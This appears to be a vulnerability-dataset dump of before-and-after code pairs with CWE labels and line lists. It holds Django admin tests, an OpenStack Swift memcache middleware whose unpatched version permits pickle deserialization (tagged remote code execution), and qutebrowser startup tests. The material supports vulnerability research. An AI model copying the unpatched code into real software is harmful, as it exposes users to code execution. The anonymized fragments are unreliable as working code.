'date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'initial-date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
'initial-date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'first_name': VAR_9.first_name,
'last_name': VAR_9.last_name,
}
def FUNC_63(self):
with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
VAR_3 = self.client.get('/admin/auth/VAR_9/?password__startswith=sha1$')
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(logger_calls), 1)
def FUNC_64(self):
VAR_27 = self.get_user_data(self.admin)
VAR_27['email'] = 'new_' + VAR_27['email']
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk, VAR_27)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_8.')
def FUNC_65(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk,
self.get_user_data(self.admin)
)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'No VAR_11 changed.')
def FUNC_66(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/VAR_2/' % self.admin.pk, {
'password1': 'password1',
'password2': 'password1',
})
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/%s/' % self.admin.pk)
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_2.')
self.logout()
self.login(VAR_2='password1')
| [
8,
23,
29,
30,
49,
57,
62,
67,
78,
84,
85,
89,
110,
111,
114,
123,
131,
132,
134,
150,
157,
169,
170,
174,
175,
176,
177,
178,
179,
180,
189,
190,
202,
203,
205,
209,
214,
218,
220,
223,
224,
226,
229,
231,
234,
236,
239,
241,
242,
245,
250,
253,
258,
261,
262,
265,
271,
277,
283,
289,
296,
304,
312,
313,
317,
319,
324,
329,
333,
335,
336,
339,
348,
351,
360,
369,
379,
389,
395,
405,
415,
425,
426,
429,
441,
444,
445,
450,
463,
464,
484,
486,
491,
492,
493,
498,
499,
507,
508,
514,
515,
525,
526,
528,
529,
537,
541,
545,
551,
557,
561,
567,
568,
576,
579,
583,
587,
591,
592,
595,
598,
605,
607,
611,
613,
618,
622,
624,
632,
640,
648,
656,
659,
660,
676,
677,
696,
703,
705,
709,
729,
730,
731,
733,
738,
746,
754,
765,
44,
45,
46,
532,
571,
64,
69,
70,
71,
72,
73,
74,
75,
76,
90,
91,
116,
117,
124,
125,
136,
137,
138,
139,
151,
152,
158,
159,
160,
171,
172,
173,
191,
192,
193,
495,
496,
497,
599,
600,
625,
626,
633,
634,
641,
642,
649,
650
] | [
8,
23,
29,
30,
49,
57,
62,
67,
78,
84,
85,
89,
110,
111,
114,
123,
131,
132,
134,
150,
157,
169,
170,
174,
175,
176,
177,
178,
179,
180,
189,
190,
202,
203,
205,
209,
214,
218,
220,
223,
224,
226,
229,
231,
234,
236,
239,
241,
242,
245,
250,
253,
258,
261,
262,
265,
271,
277,
283,
289,
296,
304,
312,
313,
317,
319,
324,
329,
333,
335,
336,
339,
348,
351,
360,
369,
379,
389,
395,
405,
415,
425,
426,
429,
441,
444,
445,
451,
464,
465,
486,
488,
493,
494,
495,
500,
501,
509,
510,
516,
517,
527,
528,
530,
531,
539,
543,
547,
553,
559,
563,
569,
570,
578,
581,
585,
589,
593,
594,
597,
600,
607,
609,
613,
615,
620,
624,
626,
634,
642,
650,
658,
661,
662,
679,
680,
700,
707,
709,
713,
733,
734,
735,
737,
742,
750,
758,
769,
44,
45,
46,
534,
573,
64,
69,
70,
71,
72,
73,
74,
75,
76,
90,
91,
116,
117,
124,
125,
136,
137,
138,
139,
151,
152,
158,
159,
160,
171,
172,
173,
191,
192,
193,
497,
498,
499,
601,
602,
627,
628,
635,
636,
643,
644,
651,
652
] |
5CWE-94
| # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class MemcacheMiddleware(object):
"""
Caching middleware that manages caching in swift.
"""
def __init__(self, app, conf):
self.app = app
self.memcache_servers = conf.get('memcache_servers')
if not self.memcache_servers:
path = os.path.join(conf.get('swift_dir', '/etc/swift'),
'memcache.conf')
memcache_conf = ConfigParser()
if memcache_conf.read(path):
try:
self.memcache_servers = \
memcache_conf.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()])
def __call__(self, env, start_response):
env['swift.cache'] = self.memcache
return self.app(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def cache_filter(app):
return MemcacheMiddleware(app, conf)
return cache_filter
| # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class MemcacheMiddleware(object):
"""
Caching middleware that manages caching in swift.
"""
def __init__(self, app, conf):
self.app = app
self.memcache_servers = conf.get('memcache_servers')
serialization_format = conf.get('memcache_serialization_support')
if not self.memcache_servers or serialization_format is None:
path = os.path.join(conf.get('swift_dir', '/etc/swift'),
'memcache.conf')
memcache_conf = ConfigParser()
if memcache_conf.read(path):
if not self.memcache_servers:
try:
self.memcache_servers = \
memcache_conf.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if serialization_format is None:
try:
serialization_format = \
memcache_conf.get('memcache',
'memcache_serialization_support')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
if serialization_format is None:
serialization_format = 2
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()],
allow_pickle=(serialization_format == 0),
allow_unpickle=(serialization_format <= 1))
def __call__(self, env, start_response):
env['swift.cache'] = self.memcache
return self.app(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def cache_filter(app):
return MemcacheMiddleware(app, conf)
return cache_filter
| remote_code_execution | {
"code": [
" if not self.memcache_servers:",
" try:",
" self.memcache_servers = \\",
" memcache_conf.get('memcache', 'memcache_servers')",
" except (NoSectionError, NoOptionError):",
" pass",
" [s.strip() for s in self.memcache_servers.split(',') if s.strip()])"
],
"line_no": [
30,
35,
36,
37,
38,
39,
43
]
} | {
"code": [
" serialization_format = conf.get('memcache_serialization_support')",
" if not self.memcache_servers or serialization_format is None:",
" if not self.memcache_servers:",
" try:",
" self.memcache_servers = \\",
" memcache_conf.get('memcache', 'memcache_servers')",
" except (NoSectionError, NoOptionError):",
" pass",
" if serialization_format is None:",
" serialization_format = \\",
" memcache_conf.get('memcache',",
" 'memcache_serialization_support')",
" pass",
" serialization_format = 2",
" [s.strip() for s in self.memcache_servers.split(',') if s.strip()],",
" allow_unpickle=(serialization_format <= 1))"
],
"line_no": [
30,
32,
37,
38,
39,
40,
41,
42,
43,
45,
46,
47,
49,
54,
57,
59
]
} |
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class CLASS_0(object):
def __init__(self, VAR_2, VAR_3):
self.app = VAR_2
self.memcache_servers = VAR_3.get('memcache_servers')
if not self.memcache_servers:
VAR_6 = os.path.join(VAR_3.get('swift_dir', '/etc/swift'),
'memcache.conf')
VAR_7 = ConfigParser()
if VAR_7.read(VAR_6):
try:
self.memcache_servers = \
VAR_7.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()])
def __call__(self, VAR_4, VAR_5):
VAR_4['swift.cache'] = self.memcache
return self.app(VAR_4, VAR_5)
def FUNC_0(VAR_0, **VAR_1):
VAR_3 = VAR_0.copy()
VAR_3.update(VAR_1)
def FUNC_1(VAR_2):
return CLASS_0(VAR_2, VAR_3)
return FUNC_1
|
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class CLASS_0(object):
def __init__(self, VAR_2, VAR_3):
self.app = VAR_2
self.memcache_servers = VAR_3.get('memcache_servers')
VAR_6 = VAR_3.get('memcache_serialization_support')
if not self.memcache_servers or VAR_6 is None:
VAR_7 = os.path.join(VAR_3.get('swift_dir', '/etc/swift'),
'memcache.conf')
VAR_8 = ConfigParser()
if VAR_8.read(VAR_7):
if not self.memcache_servers:
try:
self.memcache_servers = \
VAR_8.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if VAR_6 is None:
try:
VAR_6 = \
VAR_8.get('memcache',
'memcache_serialization_support')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
if VAR_6 is None:
VAR_6 = 2
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()],
allow_pickle=(VAR_6 == 0),
allow_unpickle=(VAR_6 <= 1))
def __call__(self, VAR_4, VAR_5):
VAR_4['swift.cache'] = self.memcache
return self.app(VAR_4, VAR_5)
def FUNC_0(VAR_0, **VAR_1):
VAR_3 = VAR_0.copy()
VAR_3.update(VAR_1)
def FUNC_1(VAR_2):
return CLASS_0(VAR_2, VAR_3)
return FUNC_1
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
21,
26,
44,
48,
49,
53,
56,
58,
23,
24,
25
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
21,
26,
31,
50,
55,
60,
64,
65,
69,
72,
74,
23,
24,
25
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Test starting qutebrowser with special arguments/environments."""
import subprocess
import socket
import sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
ascii_locale = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def _base_args(config):
"""Get the arguments to pass with every invocation."""
args = ['--debug', '--json-logging', '--no-err-windows']
if config.webengine:
args += ['--backend', 'webengine']
else:
args += ['--backend', 'webkit']
if qVersion() == '5.7.1':
# https://github.com/qutebrowser/qutebrowser/issues/3163
args += ['--qt-flag', 'disable-seccomp-filter-sandbox']
args.append('about:blank')
return args
@pytest.fixture
def temp_basedir_env(tmpdir, short_tmpdir):
"""Return a dict of environment variables that fakes --temp-basedir.
We can't run --basedir or --temp-basedir for some tests, so we mess with
XDG_*_DIR to get things relocated.
"""
data_dir = tmpdir / 'data'
config_dir = tmpdir / 'config'
runtime_dir = short_tmpdir / 'rt'
cache_dir = tmpdir / 'cache'
runtime_dir.ensure(dir=True)
runtime_dir.chmod(0o700)
(data_dir / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
env = {
'XDG_DATA_HOME': str(data_dir),
'XDG_CONFIG_HOME': str(config_dir),
'XDG_RUNTIME_DIR': str(runtime_dir),
'XDG_CACHE_HOME': str(cache_dir),
}
return env
@pytest.mark.linux
@ascii_locale
def test_downloads_with_ascii_locale(request, server, tmpdir, quteproc_new):
"""Test downloads with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/908
https://github.com/qutebrowser/qutebrowser/issues/1726
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('downloads.location.directory', str(tmpdir))
# Test a normal download
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/ä-issue908.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
# Test :prompt-open-download
quteproc_new.set_setting('downloads.location.prompt', 'true')
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
quteproc_new.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
quteproc_new.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(tmpdir.listdir()) == 1
assert (tmpdir / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@ascii_locale
def test_open_with_ascii_locale(request, server, tmpdir, quteproc_new, url):
"""Test opening non-ascii URL with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('url.auto_search', 'never')
# Test opening a file whose name contains non-ascii characters.
# No exception thrown means test success.
quteproc_new.send_cmd(':open {}'.format(url))
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@ascii_locale
def test_open_command_line_with_ascii_locale(request, server, tmpdir,
quteproc_new):
"""Test opening file via command line with a non-ascii name with LC_ALL=C.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
# The file does not actually have to exist because the relevant checks will
# all be called. No exception thrown means test success.
args = (['--temp-basedir'] + _base_args(request.config) +
['/home/user/föö.html'])
quteproc_new.start(args, env={'LC_ALL': 'C'}, wait_focus=False)
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def test_misconfigured_user_dirs(request, server, temp_basedir_env,
tmpdir, quteproc_new):
"""Test downloads with a misconfigured XDG_DOWNLOAD_DIR.
https://github.com/qutebrowser/qutebrowser/issues/866
https://github.com/qutebrowser/qutebrowser/issues/1269
"""
home = tmpdir / 'home'
home.ensure(dir=True)
temp_basedir_env['HOME'] = str(home)
assert temp_basedir_env['XDG_CONFIG_HOME'] == tmpdir / 'config'
(tmpdir / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
quteproc_new.start(_base_args(request.config), env=temp_basedir_env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/download.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
line = quteproc_new.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
line.expected = True
quteproc_new.wait_for(category='downloads',
message='Download download.bin finished')
assert (home / 'download.bin').exists()
def test_no_loglines(request, quteproc_new):
"""Test qute://log with --loglines=0."""
quteproc_new.start(args=['--temp-basedir', '--loglines=0'] +
_base_args(request.config))
quteproc_new.open_path('qute://log')
assert quteproc_new.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def test_optimize(request, quteproc_new, capfd, level):
quteproc_new.start(args=['--temp-basedir'] + _base_args(request.config),
env={'PYTHONOPTIMIZE': level})
if level == '2':
msg = ("Running on optimize level higher than 1, unexpected behavior "
"may occur.")
line = quteproc_new.wait_for(message=msg)
line.expected = True
# Waiting for quit to make sure no other warning is emitted
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def test_version(request):
"""Test invocation with --version argument."""
args = ['-m', 'qutebrowser', '--version'] + _base_args(request.config)
# can't use quteproc_new here because it's confused by
# early process termination
proc = QProcess()
proc.setProcessChannelMode(QProcess.SeparateChannels)
proc.start(sys.executable, args)
ok = proc.waitForStarted(2000)
assert ok
ok = proc.waitForFinished(10000)
stdout = bytes(proc.readAllStandardOutput()).decode('utf-8')
print(stdout)
stderr = bytes(proc.readAllStandardError()).decode('utf-8')
print(stderr)
assert ok
assert proc.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\s+v\d+(\.\d+)', stdout) is not None
def test_qt_arg(request, quteproc_new, tmpdir):
"""Test --qt-arg."""
args = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(tmpdir / 'does-not-exist')] + _base_args(request.config))
quteproc_new.start(args)
msg = 'QCss::Parser - Failed to load file "*does-not-exist"'
line = quteproc_new.wait_for(message=msg)
line.expected = True
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@utils.skip_qt511
def test_webengine_inspector(request, quteproc_new):
if not request.config.webengine:
pytest.skip()
args = (['--temp-basedir', '--enable-webengine-inspector'] +
_base_args(request.config))
quteproc_new.start(args)
line = quteproc_new.wait_for(
message='Remote debugging server started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
port = int(line.message.split(':')[-1])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
@pytest.mark.linux
def test_webengine_download_suffix(request, quteproc_new, tmpdir):
"""Make sure QtWebEngine does not add a suffix to downloads."""
if not request.config.webengine:
pytest.skip()
download_dir = tmpdir / 'downloads'
download_dir.ensure(dir=True)
(tmpdir / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(download_dir))
env = {'XDG_CONFIG_HOME': str(tmpdir)}
args = (['--temp-basedir'] + _base_args(request.config))
quteproc_new.start(args, env=env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
quteproc_new.set_setting('downloads.location.directory', str(download_dir))
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(category='downloads', message='Download * finished')
quteproc_new.open_path('data/downloads/download.bin', wait=False)
quteproc_new.wait_for(message='Entering mode KeyMode.yesno *')
quteproc_new.send_cmd(':prompt-accept yes')
quteproc_new.wait_for(category='downloads', message='Download * finished')
files = download_dir.listdir()
assert len(files) == 1
assert files[0].basename == 'download.bin'
def test_command_on_start(request, quteproc_new):
"""Make sure passing a command on start works.
See https://github.com/qutebrowser/qutebrowser/issues/2408
"""
args = (['--temp-basedir'] + _base_args(request.config) +
[':quickmark-add https://www.example.com/ example'])
quteproc_new.start(args)
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_launching_with_python2():
try:
proc = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], stderr=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert proc.returncode == 1
error = "At least Python 3.5 is required to run qutebrowser"
assert proc.stderr.decode('ascii').startswith(error)
def test_initial_private_browsing(request, quteproc_new):
"""Make sure the initial window is private when the setting is set."""
args = (_base_args(request.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- private: True
tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_loading_empty_session(tmpdir, request, quteproc_new):
"""Make sure loading an empty session opens a window."""
session = tmpdir / 'session.yml'
session.write('windows: []')
args = _base_args(request.config) + ['--temp-basedir', '-r', str(session)]
quteproc_new.start(args)
quteproc_new.compare_session("""
windows:
- tabs:
- history:
- url: about:blank
""")
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
def test_qute_settings_persistence(short_tmpdir, request, quteproc_new):
"""Make sure settings from qute://settings are persistent."""
args = _base_args(request.config) + ['--basedir', str(short_tmpdir)]
quteproc_new.start(args)
quteproc_new.open_path(
'qute://settings/set?option=search.ignore_case&value=always')
assert quteproc_new.get_setting('search.ignore_case') == 'always'
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
quteproc_new.start(args)
assert quteproc_new.get_setting('search.ignore_case') == 'always'
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Test starting qutebrowser with special arguments/environments."""
import subprocess
import socket
import sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
ascii_locale = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def _base_args(config):
"""Get the arguments to pass with every invocation."""
args = ['--debug', '--json-logging', '--no-err-windows']
if config.webengine:
args += ['--backend', 'webengine']
else:
args += ['--backend', 'webkit']
if qVersion() == '5.7.1':
# https://github.com/qutebrowser/qutebrowser/issues/3163
args += ['--qt-flag', 'disable-seccomp-filter-sandbox']
args.append('about:blank')
return args
@pytest.fixture
def temp_basedir_env(tmpdir, short_tmpdir):
"""Return a dict of environment variables that fakes --temp-basedir.
We can't run --basedir or --temp-basedir for some tests, so we mess with
XDG_*_DIR to get things relocated.
"""
data_dir = tmpdir / 'data'
config_dir = tmpdir / 'config'
runtime_dir = short_tmpdir / 'rt'
cache_dir = tmpdir / 'cache'
runtime_dir.ensure(dir=True)
runtime_dir.chmod(0o700)
(data_dir / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
env = {
'XDG_DATA_HOME': str(data_dir),
'XDG_CONFIG_HOME': str(config_dir),
'XDG_RUNTIME_DIR': str(runtime_dir),
'XDG_CACHE_HOME': str(cache_dir),
}
return env
@pytest.mark.linux
@ascii_locale
def test_downloads_with_ascii_locale(request, server, tmpdir, quteproc_new):
"""Test downloads with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/908
https://github.com/qutebrowser/qutebrowser/issues/1726
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('downloads.location.directory', str(tmpdir))
# Test a normal download
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/ä-issue908.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
# Test :prompt-open-download
quteproc_new.set_setting('downloads.location.prompt', 'true')
quteproc_new.send_cmd(':download {}'.format(url))
quteproc_new.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
quteproc_new.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
quteproc_new.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(tmpdir.listdir()) == 1
assert (tmpdir / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@ascii_locale
def test_open_with_ascii_locale(request, server, tmpdir, quteproc_new, url):
"""Test opening non-ascii URL with LC_ALL=C set.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
args = ['--temp-basedir'] + _base_args(request.config)
quteproc_new.start(args, env={'LC_ALL': 'C'})
quteproc_new.set_setting('url.auto_search', 'never')
# Test opening a file whose name contains non-ascii characters.
# No exception thrown means test success.
quteproc_new.send_cmd(':open {}'.format(url))
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@ascii_locale
def test_open_command_line_with_ascii_locale(request, server, tmpdir,
quteproc_new):
"""Test opening file via command line with a non-ascii name with LC_ALL=C.
https://github.com/qutebrowser/qutebrowser/issues/1450
"""
# The file does not actually have to exist because the relevant checks will
# all be called. No exception thrown means test success.
args = (['--temp-basedir'] + _base_args(request.config) +
['/home/user/föö.html'])
quteproc_new.start(args, env={'LC_ALL': 'C'}, wait_focus=False)
if not request.config.webengine:
line = quteproc_new.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
line.expected = True
quteproc_new.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def test_misconfigured_user_dirs(request, server, temp_basedir_env,
tmpdir, quteproc_new):
"""Test downloads with a misconfigured XDG_DOWNLOAD_DIR.
https://github.com/qutebrowser/qutebrowser/issues/866
https://github.com/qutebrowser/qutebrowser/issues/1269
"""
home = tmpdir / 'home'
home.ensure(dir=True)
temp_basedir_env['HOME'] = str(home)
assert temp_basedir_env['XDG_CONFIG_HOME'] == tmpdir / 'config'
(tmpdir / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
quteproc_new.start(_base_args(request.config), env=temp_basedir_env)
quteproc_new.set_setting('downloads.location.prompt', 'false')
url = 'http://localhost:{port}/data/downloads/download.bin'.format(
port=server.port)
quteproc_new.send_cmd(':download {}'.format(url))
line = quteproc_new.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
line.expected = True
quteproc_new.wait_for(category='downloads',
message='Download download.bin finished')
assert (home / 'download.bin').exists()
def test_no_loglines(request, quteproc_new):
"""Test qute://log with --loglines=0."""
quteproc_new.start(args=['--temp-basedir', '--loglines=0'] +
_base_args(request.config))
quteproc_new.open_path('qute://log')
assert quteproc_new.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def test_optimize(request, quteproc_new, capfd, level):
quteproc_new.start(args=['--temp-basedir'] + _base_args(request.config),
env={'PYTHONOPTIMIZE': level})
if level == '2':
msg = ("Running on optimize level higher than 1, unexpected behavior "
"may occur.")
line = quteproc_new.wait_for(message=msg)
line.expected = True
# Waiting for quit to make sure no other warning is emitted
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def test_version(request):
"""Test invocation with --version argument."""
args = ['-m', 'qutebrowser', '--version'] + _base_args(request.config)
# can't use quteproc_new here because it's confused by
# early process termination
proc = QProcess()
proc.setProcessChannelMode(QProcess.SeparateChannels)
proc.start(sys.executable, args)
ok = proc.waitForStarted(2000)
assert ok
ok = proc.waitForFinished(10000)
stdout = bytes(proc.readAllStandardOutput()).decode('utf-8')
print(stdout)
stderr = bytes(proc.readAllStandardError()).decode('utf-8')
print(stderr)
assert ok
assert proc.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\s+v\d+(\.\d+)', stdout) is not None
def test_qt_arg(request, quteproc_new, tmpdir):
"""Test --qt-arg."""
args = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(tmpdir / 'does-not-exist')] + _base_args(request.config))
quteproc_new.start(args)
msg = 'QCss::Parser - Failed to load file "*does-not-exist"'
line = quteproc_new.wait_for(message=msg)
line.expected = True
quteproc_new.send_cmd(':quit')
quteproc_new.wait_for_quit()
@utils.skip_qt511
def test_webengine_inspector(request, quteproc_new):
if not request.config.webengine:
pytest.skip()
args = (['--temp-basedir', '--enable-webengine-inspector'] +
_base_args(request.config))
quteproc_new.start(args)
line = quteproc_new.wait_for(
message='Remote debugging server started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
port = int(line.message.split(':')[-1])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
@pytest.mark.linux
def test_webengine_download_suffix(request, quteproc_new, tmpdir):
"""Make sure QtWebEngine does not add a suffix to downloads."""
if not request.config.webengine:
pytest.skip()
download_dir = tmpdir / 'downloads'
download_dir.ensure(dir=True)
(tmpdir / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(download_dir))
env = {'XDG_CONFIG_HOME': str(tmpdir)}
